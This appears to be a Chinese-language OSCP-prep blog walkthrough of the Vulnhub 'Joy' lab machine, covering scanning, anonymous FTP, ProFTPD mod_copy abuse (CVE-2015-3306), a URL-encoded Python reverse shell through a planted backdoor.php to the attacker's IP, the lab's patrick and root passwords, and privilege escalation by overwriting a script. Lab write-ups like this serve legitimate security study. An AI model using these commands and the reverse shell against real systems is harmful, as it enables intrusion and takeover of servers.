OSCP备考_0x17_Vulnhub靶机_joy

Ethan医生2周前靶场35
名称说明
靶机下载链接
攻击机(kali)ip:192.168.233.168
靶机(CentOS)ip:192.168.233.184


arp-scan 192.168.233.1/24


image.png

nmap -p- 192.168.233.184  

image.png

nmap -p21,22,25,80,110,139,143,445,465,587,993,995 -A -T4 192.168.233.184


image.png


http://192.168.233.184/ossec/

gobuster dir -u http://192.168.233.184/ossec -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html

image.png


上面说明了21端口可以使用Anonymous尝试看看能不能找到啥点


image.png

image.png

reminder打开没啥用,另外一个名称Patrick

image.png

我们可以看到一个版本号的文件,但是它存在于patrick路径中,我们是没有权限去获取的,所以尝试将其转移到/upload路径中

image.png

image.png

可以看下有没有啥漏洞                                                                                                                                                                                                      

searchsploit ProFTPD ,36742


image.png



telnet和ftp命令的区别:

telnet连接后,用户主机实际成为远程TELNET服务器的一个虚拟终端(或称是哑终端),一切服务完全在远程服务器上执行,但用户决不能从远程服务器中下载或上传文件,或拷贝文件到用户主机中来。

ftp则不同,它是采用客户机/服务器模式,用户能够操作FTP服务器中的目录,上传或下载文件,但用户不能请求服务器执行某个文件。


复制version_control文件到/home/ftp/upload目录

site cpfr /home/patrick/version_control

site cpto /home/ftp/upload/version_control

image.png

image.png

image.png

image.png


https://github.com/t0kx/exploit-CVE-2015-3306/blob/master/exploit.py

有些时后kali内的挡案无法使用可以查看github上的

http://192.168.233.184/backdoor.php后门直接反弹WEBSHELL

image.png


http://192.168.233.184/backdoor.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.233.168%22,3333));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27


image.png

找到root密码,但是无法直接切换

image.png

image.png

切换patrick,

credentials for JOY:

patrick:apollo098765

root:howtheheckdoiknowwhattherootpasswordis

image.png

image.png

遇到权限问题看怎样可以覆盖挡案

image.png

将刚刚生成的test上传到FTP在使用FTP去覆盖挡案

site cpfr /home/ftp/upload/test

site cpto /home/patrick/script/test

image.png

再次登入拿root权限

image.png

执行的时后最好到自己的home/patrick目录下使用

标签: OSCP

相关文章

OSCP备考_0x05_HackThBox靶机_Linux_Nineveh

OSCP备考_0x05_HackThBox靶机_Linux_Nineveh

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.143.34 (扫描TCP)nmap -sU --top-ports 100 10.129...

OSCP备考_0x04_Vulnhub靶机_KIOPTRIX:LEVEL1.3(#4)

OSCP备考_0x04_Vulnhub靶机_KIOPTRIX:LEVEL1.3(#4)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-13-4,25/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

OSCP备考_0x01_HackThBox靶机_Linux_Shocker

OSCP备考_0x01_HackThBox靶机_Linux_Shocker

先连接到外网开放的服务器openvpn xxx.ovpn信息收集nmap -p- 10.129.216.48 (这样扫描太慢了)nmap -sCV -p- --min-rate 10000 -T4 -...

OSCP备考_0x27_HackThBox靶机_Linux_ Admirer

OSCP备考_0x27_HackThBox靶机_Linux_ Admirer

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.128.76 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x06_HackThBox靶机_Linux_Sense

OSCP备考_0x06_HackThBox靶机_Linux_Sense

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.131.103 (扫描TCP)上面的信息提供了直接跳转到443端口nmap -sU --top-ports...

OSCP备考_0x16_HackThBox靶机_Linux_jarvis

OSCP备考_0x16_HackThBox靶机_Linux_jarvis

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.229.137 (扫描TCP)nmap -sU --top-ports 100 ...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。